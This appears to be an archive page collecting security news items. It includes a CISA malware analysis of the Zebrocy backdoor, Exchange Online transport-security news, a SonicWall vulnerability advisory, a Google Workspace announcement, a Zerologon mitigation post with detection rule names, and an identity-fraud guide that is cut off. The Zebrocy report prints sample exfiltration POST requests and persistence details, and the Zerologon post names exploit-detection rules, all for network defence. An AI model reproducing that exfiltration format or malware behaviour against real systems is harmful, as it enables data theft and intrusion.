Internet Archives - Page 79 of 82

Malware Analysis Report (AR20-303B) MAR-10310246-1.v1 – ZEBROCY Backdoor

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Details

Name	smqft_exe
Size	4307968 bytes
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1	ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA256	0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512	bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep	49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy	6.196940

Antivirus

BitDefender	Gen:Variant.Babar.17722
Emsisoft	Gen:Variant.Babar.17722 (B)
Lavasoft	Gen:Variant.Babar.17722

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date	1969-12-31 19:00:00-05:00
Import Hash	20acdf581665d0a5acf497c2fe5e0662

PE Sections

MD5	Name	Raw Size	Entropy
b6114d2ef9c71d56d934ad743f66d209	header	1024	2.184050
0ead1c8fd485e916e3564c37083fb754	.text	1952256	6.048645
a5a4f98bad8aefba03b1fd8efa3e8668	.data	196096	5.841971
96bfb1a9a7e45816c45b7d7c1bf3c578	.rdata	2153984	5.690400
916cd27c0226ce956ed74ddf600a3a94	.eh_fram	1024	4.244370
d41d8cd98f00b204e9800998ecf8427e	.bss	0	0.000000
1f825370fd049566e1e933455eb0cd06	.idata	2560	4.462264
486c39eb96458f6f5bdb80d71bb0f828	.CRT	512	0.118370
aa692f6a7441edad64447679b7d321e8	.tls	512	0.224820

Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244.”

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228–
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108–
–End POST request sample–

–End POST requests–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details

Name	sespmw_exe
Size	4313600 bytes
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	e8596fd7a15ecc86abbbfdea17a9e73a
SHA1	be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA256	2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA512	4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep	49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy	6.197768

Antivirus

BitDefender	Gen:Variant.Babar.17722
Emsisoft	Gen:Variant.Babar.17722 (B)
Lavasoft	Gen:Variant.Babar.17722

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date	1970-01-04 14:01:20-05:00
Import Hash	20acdf581665d0a5acf497c2fe5e0662

PE Sections

MD5	Name	Raw Size	Entropy
2ebbe6c38d9e8d4da2449cc05f78054a	header	1024	2.198390
a7c0885448e7013e05bf5ff61b673949	.text	1954816	6.046127
9bf966747acfa91eea3d6a1ef17cc30f	.data	196096	5.843286
31182660fce8ae07d0350ebe456b9179	.rdata	2157056	5.696834
9eeb1eeb42e99c54c6429f9122285336	.eh_fram	1024	4.292769
d41d8cd98f00b204e9800998ecf8427e	.bss	0	0.000000
0bc884e39b3ba72fb113d63988590b5c	.idata	2560	4.424718
9bbfafc74bc296cd99dc8307ffe120ac	.CRT	512	0.114463
2b60c482048e4a03fbb82db9c3416db5	.tls	512	0.224820

Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI. The file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary “ba9c59783b52b93aa6dfd4cfffc16f2b”. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244”.

It also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db–
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create schedule a task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870
CISA Service Desk (UNCLASS)
CISA SIPR (SIPRNET)
CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Web: https://malware.us-cert.gov
E-Mail: submit@malware.us-cert.gov
FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Source :
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

Microsoft Office 365 adds protection against downgrade and MITM attacks

Microsoft is working on adding SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication security and integrity.

Once MTA-STS is available in Office 365 Exchange Online, emails sent by users via Exchange Online will only one delivered using connections with both authentication and encryption, protecting against both email interception and attacks.

Protection against MITM and downgrade attacks

MTA-STS strengthens Exchange Online email security and solves multiple SMTP security problems including the lack of support for secure protocols, expired TLS certificates, and certs not issued by trusted third parties or matching server domain names.

Given that mail servers will still deliver emails even though a properly secured TLS connection can’t be created, SMTP connections are exposed to various attacks including downgrade and man-in-the-middle attacks.

“[D]owngrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in clear text,” Microsoft says. “Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server.”

“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission,” the company explains in a Microsoft 365 roadmap entry.

“Exchange Online (EXO) outbound mail flow now supports MTA-STS,” Microsoft also adds.https://www.youtube.com/embed/VY3YvrrHXJk?t=775

Exchange Online SMTP MTA Strict Transport Security (MTA-STS) support is currently in development and the company is planning to make it generally available during December in all environments, for all Exchange Online users.

DNSSEC and DANE for SMTP also coming

Microsoft is also working on including support for the DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities) to Office 365 Exchange Online.

Support for the two SMTP standards will be added to both inbound and outbound mail, “specific to SMTP traffic between SMTP gateways” according to the Microsoft 365 roadmap [1, 2] and this blog post.

According to Microsoft, after including support for the two SMTP security standards in Exchange Online:

DANE for SMTP will provide a more secure method for email transport. DANE uses the presence of DNS TLSA resource records to securely signal TLS support to ensure sending servers can successfully authenticate legitimate receiving email servers. This makes the secure connection resistant to downgrade and MITM attacks.
DNSSEC works by digitally signing records for DNS lookup using public key cryptography. This ensures that the received DNS records have not been tampered with and are authentic.

Microsoft is planning to release DANE and DNSSEC for SMTP in two phases, with the first one to include only outbound support during December 2020 and with the second to add inbound support by the end of next year.

Source :
https://www.bleepingcomputer.com/news/security/office-365-adds-protection-against-downgrade-and-mitm-attacks/

Critical SonicWall vulnerability affects 800K firewalls, patch now

A critical stack-based Buffer Overflow vulnerability has been discovered in SonicWall VPNs.

When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.

Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS ran by hundreds of thousands of active VPNs.

Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.

Shodan lists over 800,000 devices

Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.

As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.

Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.

sonicwall vpns shodan — **Potentially exploitable devices listed on Shodan running vulnerable SonicOS versions**
Source: BleepingComputer

Impacted versions and remediation guidance

The following SonicWall VPN devices are impacted by CVE-2020-5135:

SonicOS 6.5.4.7-79n and earlier
SonicOS 6.5.1.11-4n and earlier
SonicOS 6.0.5.3-93o and earlier
SonicOSv 6.5.4.4-44v-21-794 and earlier
SonicOS 7.0.0.0-1

“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.

The following versions are available to upgrade to for safeguarding against this vulnerability:

SonicOS 6.5.4.7-83n
SonicOS 6.5.1.12-1n
SonicOS 6.0.5.3-94o
SonicOS 6.5.4.v-21s-987
Gen 7 7.0.0.0-2 and onwards

Provided the vast number of devices that are still running the outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.

Source :
https://www.bleepingcomputer.com/news/security/critical-sonicwall-vulnerability-affects-800k-firewalls-patch-now/

Introducing Google Workspace

For more than a decade, we’ve been building products to help people transform the way they work.

Now, work itself is transforming in unprecedented ways. For many of us, work is no longer a physical place we go to, and interactions that used to take place in person are being rapidly digitized. Office workers no longer have impromptu discussions at the coffee machine or while walking to meetings together, and instead have turned their homes into workspaces. Frontline workers, from builders on a construction site to delivery specialists keeping critical supply chains moving, are turning to their phones to help get their jobs done. While doctors treating patients and local government agencies engaging with their communities are accelerating how they can use technology to deliver their services.

Amidst this transformation, time is more fragmented—split between work and personal responsibilities—and human connections are more difficult than ever to establish and maintain.

These are unique challenges, but they also represent a significant opportunity to help people succeed in this highly distributed and increasingly digitized world. With the right solution in place, people are able to collaborate more easily, spend time on what matters most, and foster human connections, no matter where they are.

That solution is Google Workspace: everything you need to get anything done, now in one place. Google Workspace includes all of the productivity apps you know and love—Gmail, Calendar, Drive, Docs, Sheets, Slides, Meet, and many more. Whether you’re returning to the office, working from home, on the frontlines with your mobile device, or connecting with customers, Google Workspace is the best way to create, communicate, and collaborate.https://www.youtube.com/embed/bE31y5HbukA

With Google Workspace, we’re introducing three major developments:

a new, deeply integrated user experience that helps teams collaborate more effectively, frontline workers stay connected, and businesses power new digital customer experiences
a new brand identity that reflects our ambitious product vision and the way our products work together
new ways to get started with solutions tailored to the unique needs of our broad range of customers

New user experience

At Next OnAir in July, we announced a better home for work. One that thoughtfully brings together core tools for communication and collaboration—like chat, email, voice and video calling, and content management and collaboration—into a single, unified experience to ensure that employees have access to everything they need in one place. This integrated experience is now generally available to all paying customers of Google Workspace.

In the coming months we’ll also be bringing this new experience to consumers to help them do things like set up a neighborhood group, manage a family budget, or plan a celebration using integrated tools like Gmail, Chat, Meet, Docs, and Tasks.

We’ve already made it easier for business users to connect with customers and partners using guest access features in Chat and Drive, and in the coming weeks, you’ll be able to dynamically create and collaborate on a document with guests in a Chat room. This makes it easy to share content and directly work together with those outside your organization, and ensure that everyone has access and visibility to the same information.

When every minute you spend at work is a minute you could be helping your daughter with her homework, efficiency is everything. We’ve been working hard to add helpful features that make it easier to get your most important work done. For example, in Docs, Sheets, and Slides, you can now preview a linked file without having to open a new tab—which means less time spent moving between apps, and more time getting work done. And beginning today, when you @mention someone in your document, a smart chip will show contact details, including for those outside your organization, provide context and even suggest actions like adding that person to Contacts or reaching out via email, chat or video.

By connecting you to relevant content and people right in Docs, Sheets and Slides, Google Workspace helps you get more done from where you already are.

We also recognize that reinforcing human connections is even more important when people are working remotely and interacting with their customers digitally. It’s what keeps teams together and helps build trust and loyalty with your customers.

Back in July, we shared that we’re bringing Meet picture-in-picture to Gmail and Chat, so you can actually see and hear the people you’re working with, while you’re collaborating. In the coming months, we’ll be rolling out Meet picture-in-picture to Docs, Sheets, and Slides, too. This is especially powerful for customer interactions where you’re pitching a proposal or walking through a document. Where before, you could only see the file you were presenting, now you’ll get all those valuable nonverbal cues that come with actually seeing someone’s face.

And because we know many companies are implementing a mix of remote and in-person work environments, Meet supports a variety of devices with the best of Google AI built-in. From helpful and inclusive Series One hardware kits that provide immersive sound and effortlessly scalability, to native integrations with Chromecast and Nest Smart Displays that make your work experience more enjoyable—whether that’s at home or in the office.

New brand identity

10 years ago, when many of our products were first developed, they were created as individual apps that solved distinct challenges—like a better email with Gmail, or a new way for individuals to collaborate together with Docs. Over time, our products have become more integrated, so much so that the lines between our apps have started to disappear.

Our new Google Workspace brand reflects this more connected, helpful, and flexible experience, and our icons will reflect the same. In the coming weeks, you will see new four-color icons for Gmail, Drive, Calendar, Meet, and our collaborative content creation tools like Docs, Sheets, Slides that are part of the same family. They represent our commitment to building integrated communication and collaboration experiences for everyone, all with helpfulness from Google.https://www.youtube.com/embed/uZXa0N0-Zu0

We are also bringing Google Workspace to our education and nonprofit customers in the coming months. Education customers can continue to access our tools via G Suite for Education, which includes Classroom, Assignments, Gmail, Calendar, Drive, Docs, Sheets, Slides, and Meet. G Suite for Nonprofits will continue to be available to eligible organizations through the Google for Nonprofits program.

New ways to get started

Simplicity, helpfulness, flexibility—these guiding principles apply both to the way people experience our products and to the way we do business. All of our customers share a need for transformative solutions—whether to power remote work, support frontline workers, create immersive digital experiences for their own customers, or all of the above—but their storage, management, and security and compliance needs often vary greatly.

In order to provide more choice and help customers get the most out of Google Workspace, we are evolving our editions to provide more tailored offerings. Our new editions for smaller businesses are aimed at those often looking to make fast, self-serviced purchases. Our editions for larger enterprises are designed to help organizations that have more complex implementation needs and often require technical assistance over the course of a longer buying and deployment cycle.

You can learn more about these new offerings on our pricing page. And existing customers can read more here.

Empowering our customers and partners

You, our customers and our users, are our inspiration as we work together to navigate the change ahead. This is an incredibly challenging time, but we believe it’s also the beginning of a new approach to working together. One that is more productive, collaborative, and impactful.

Google Workspace embodies our vision for a future where work is more flexible, time is more precious, and enabling stronger human connections becomes even more important. It’s a vision we’ve been building toward for more than a decade, and one we’re excited to bring to life together with you.

Source :
https://cloud.google.com/blog/products/workspace/introducing-google-workspace

“Zerologon” Understanding the Issues and Applying Solutions

A new CVE was released recently that has made quite a few headlines – CVE-2020-1472. Zerologon, as it’s called, may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller.

To put that more simply, this vulnerability in the Netlogon Remote Protocol (MS-NRPC) could allow attackers to run their applications on a device on the network. An unauthenticated attacker would use MS-NRPC to connect to a Domain Controller (DC) to obtain administrative access.

According to Dustin Childs with Trend Micro’s Zero Day Initiative (ZDI), “What’s worse is that there is not a full fix available. This patch enables the DCs to protect devices, but a second patch currently slated for Q1 2021 enforces secure Remote Procedure Call (RPC) with Netlogon to fully address this bug. After applying this patch, you’ll still need to make changes to your DC. Microsoft published guidelines to help administrators choose the correct settings.”

But if there’s a patch, why is this a big deal?
You might be thinking, “Well if there’s a patch, this really isn’t an issue.” But the idea of “just patch it” is not as easy as it sounds – check out this post (also from Dustin with the ZDI) for more insights on barriers to patching.

The average Mean Time to Patch (MTTP) is 60 to 150 days. This CVE was published in early August, so that would put the average time for implementing this patch between October 2020 and January 2021.

You have maybe heard the security industry joke that after Patch Tuesday comes Exploit Wednesday. That’s the comedic way to suggest that after a batch of patches for new CVEs are released the first Tuesday of every month from Microsoft and Adobe, attackers get to work reversing the patches to write exploits to take advantage of the bugs before patches have been applied.

Given the MTTP, that’s 2-5 months that your organization is left exposed to a known threat.

So what can I do to protect my organization?
Fortunately, there are advanced protections available for organizations to stay protected, including virtual patching. This provides an extra layer of security to help protect against vulnerabilities before you apply the official vendor patch. As the name suggests, it’s very similar to a patch because it is specifically designed to protect your environment with intrusion protection system (IPS) capabilities in case someone attempted to exploit that vulnerability. In general, virtual patches can be a critical safety net to allow you to patch in the way that works for your organization.

With Trend Micro, our virtual patching technology helps you mitigate attacks focused on thousands of vulnerabilities, giving you the flexibility to patch regularly without breaking your operational processes for every emergency patch. Other features, such as log inspection, also help you get valuable insight into post-patch exploitation attempts on your network even after you have fully patched. To learn more about Trend Micro protection for CVE-2020-1472, read our knowledge base article here.

On September 11, 2020, detailed technical information was made public regarding a critical Microsoft Windows vulnerability (CVSS 10) that was included in Microsoft’s August 2020 Patch Tuesday set of updates and appears to affect all currently supported Windows Server (2008 R2 and above).

When originally disclosed in August, the vulnerability was given the official designation of CVE-2020-1472, but not much detail on the vulnerability itself was made public.

However, we know that this vulnerability, now dubbed “Zerologon,” may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller. From there, a variety of other attacks, including but not limited to disabling security features, changing passwords, and essentially taking over the domain are possible.

The entire attack as demonstrated, is very fast, and can be executed in approximately 3 seconds, so it could be very dangerous. In addition, Trend Micro is now aware of weaponized proof-of-concept code that has been made publicly available, meaning that real exploits could be close behind.
DETAILS
Mitigation and Protection

First and foremost, the first line of protection against this vulnerability is to ensure that all affected systems are patched with Microsoft’s latest security update. This continues to be the primary recommendation for protection against any exploit that that may arise from this vulnerability.

According to the research, there is one serious limitation to exploits of this vulnerability – specifically it cannot be exploited remotely. An attacker will first need to gain access to the network domain via other means (legitimately or not). So one major mitigation point would be to ensure that network access (both physical and remote) are carefully guarded. However, if an attacker has obtained access to a network via another vulnerability or legitimately, this could become a powerful exploit.

Trend Micro Protection

To assist customers, Trend Micro has created and released some additional layers of protection in the form of Deep Security and Cloud One – Workload Security IPS rules and TippingPoint filters that may help organizations strengthen their overall security posture, especially in situations where comprehensive patching may take time or is not feasible.

IPS Rules

Deep Security and Cloud One – Workload Security, Vulnerability Protection and Apex One Vulnerability Protection (iVP)
Rule 1010519 – Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Rule 1010521 – Netlogon Elevation of Privilege Vulnerability Over SMB (CVE-2020-1472)
Rule 1010539 – Identified NTLM Brute Force Attempt (ZeroLogon) (CVE-2020-1472)
Please note that the rules are already set to Prevent.

Worry-Free Business Security Services
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability Over SMB (CVE-2020-1472)
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability (CVE-2020-1472)
TippingPoint
Filter 38166: MS-NRPC: Microsoft Windows Netlogon Zerologon Authentication Bypass Attempt
Filter 38235: MS-NRPC: Microsoft Windows NetrServerAuthenticate Request
Please note that the posture on this filter has been changed to Enable by Default.

Trend Micro TxONE
1137620: RPC Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)

Other Inspection / Detection Rules

Deep Security Log Inspection
1010541 – Netlogon Elevation Of Privilege Vulnerability (Zerologon) (CVE-2020-1472)
This Log Inspection (LI) rule for Deep Security gives administrators visibility into potential exploit activity. Due to the complexity of this vulnerability, the Log Inspection rule will only log activities against systems that have already applied the Microsoft patch. Administrators who have patched critical servers with Deep Security may find this information useful internally to help accelerate patching of endpoints and non-critical systems if there is evidence of activity in their environment.

Deep Discovery Inspector
Rule 4453: CVE-2020-1472_DCE_RPC_ZEROLOGON_EXPLOIT_REQUEST
Rule 4455: CVE-2020-1472_SMB2_ZEROLOGON_EXPLOIT_REQUEST

Trend Micro is continuing to aggressively look into other forms of detection and protection to assist our customers, but we do want to continue to reiterate that the primary recommendation is to apply the official Microsoft patches as soon as possible. We will continue to update this article and our customers if/when additional layers of protection are found.

References
Trend Micro Blog: Zerologon” and the Value of Virtual Patching – https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html
Trend Micro Video (Youtube) – Cloud One – Workload Security about Zerologon
Microsoft Advisory – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Source :

https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html

https://success.trendmicro.com/solution/000270328?_ga=2.197085612.1262457598.1602397006-1044924476.1597417197

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more of our time online since the crisis hit. Whether it’s ordering food for delivery, livestreaming concerts, holding virtual parties, or engaging in a little retail therapy, the digital interactions of many Americans are on the rise. This means we’re also sharing more of our personal and financial information online, with each other and the organizations we interact with. Unfortunately, as ever, there are bad guys around every digital corner looking for a piece of the action.

The bottom line is that personally identifiable information (PII) is the currency of internet crime. And cyber-criminals will do whatever they can to get their hands on it. When they commit identity theft with this data, it can be a messy business, potentially taking months for banks and businesses to investigate before you get your money and credit rating back. At a time of extreme financial hardship, this is the last thing anyone needs.

It therefore pays to be careful about how you use your data and how you protect it. Even more: it’s time to get proactive and monitor it—to try and spot early on if it has been stolen. Here’s what you need to know to protect your identity data.

How identity theft works

First, some data on the scope of the problem. In the second quarter of 2020 alone 349,641 identity theft reports were filed with the FTC. To put that in perspective, it’s over half of the number for the whole of 2019 (650,572), when consumers reported losing more than $1.9 billion to fraud. What’s driving this huge industry? A cybercrime economy estimated to be worth as much as $1.5 trillion annually.

Specialized online marketplaces and private forums provide a user-friendly way for cyber-criminals and fraudsters to easily buy and sell stolen identity data. Many are on the so-called dark web, which is hidden from search engines and requires a specialized anonymizing browser like Tor to access. However, plenty of this criminal activity also happens in plain sight, on social media sites and messaging platforms. This underground industry is an unstoppable force: as avenues are closed down by law enforcement or criminal in-fighting, other ones appear.

At-risk personal data could be anything from email and account log-ins to medical info, SSNs, card and bank details, insurance details and much more. It all has a value on the cybercrime underground and the price fraudsters are prepared to pay will depend on supply and demand, just like in the ‘real’ world.

There are various ways for attackers to get your data. The main ones are:

Phishing: usually aimed at stealing your log-ins or tricking you into downloading keylogging or other info-stealing malware. Phishing mainly happens via email but could also occur via web, text, or phone. Around $667m was lost in imposter scams last year, according to the FTC.Malicious mobile apps disguised as legitimate software.Eavesdropping on social media: If you overshare even innocuous personal data (pet names, birth dates, etc.,) it could be used by fraudsters to access your accounts.Public Wi-Fi eavesdropping: If you’re using it, the bad guys may be too.Dumpster diving and shoulder surfing: Sometimes the old ways are still popular.Stealing devices or finding lost/misplaced devices in public places.Attacking the organizations you interact with: Unfortunately this is out of your control somewhat, but it’s no less serious. There were 1,473 reported corporate breaches in 2019, up 17% year-on-year.Harvesting card details covertly from the sites you shop with. Incidents involving this kind of “web skimming” increased 26% in March as more users flocked to e-commerce sites during lockdown.

The COVID-19 challenge

As if this weren’t enough, consumers are especially exposed to risk during the current pandemic. Hackers are using the COVID-19 threat as a lure to infect your PC or steal identity data via the phishing tactics described above. They often impersonate trustworthy institutions/officials and emails may claim to include new information on outbreaks, or vaccines. Clicking through or divulging your personal info will land you in trouble. Other fraud attempts will try to sell counterfeit or non-existent medical or other products to help combat infection, harvesting your card details in the process. In March, Interpol seized 34,000 counterfeit COVID goods like surgical masks and $14m worth of potentially dangerous pharmaceuticals.

Phone-based attacks are also on the rise, especially those impersonating government officials. The aim here is to steal your identity data and apply for government emergency stimulus funds in your name. Of the 349,641 identity theft reports filed with the FTC in Q2 2020, 77,684 were specific to government documents or benefits fraud.

What do cybercriminals do with my identity data?

Once your PII is stolen, it’s typically sold on the dark web to those who use it for malicious purposes. It could be used to:

Crack open other accounts that share the same log-ins (via credential stuffing). There were 30 billion such attempts in 2018.Log-in to your online bank accounts to drain it of funds.Open bank accounts/credit lines in your name (this can affect your credit rating).Order phones in your name or port your SIM to a new device (this impacts 7,000 Verizon customers per month).Purchase expensive items in your name, such as a new watch or television, for criminal resale. This is often done by hijacking your online accounts with e-tailers. E-commerce fraud is said to be worth around $12 billion per year.File fraudulent tax returns to collect refunds on your behalf.Claim medical care using your insurance details.Potentially crack work accounts to attack your employer.

How do I protect my identity online?

The good news among all this bad is that if you remain skeptical about what you see online, are cautious about what you share, and follow some other simple rules, you’ll stand a greater chance of keeping your PII under lock and key. Best practices include:

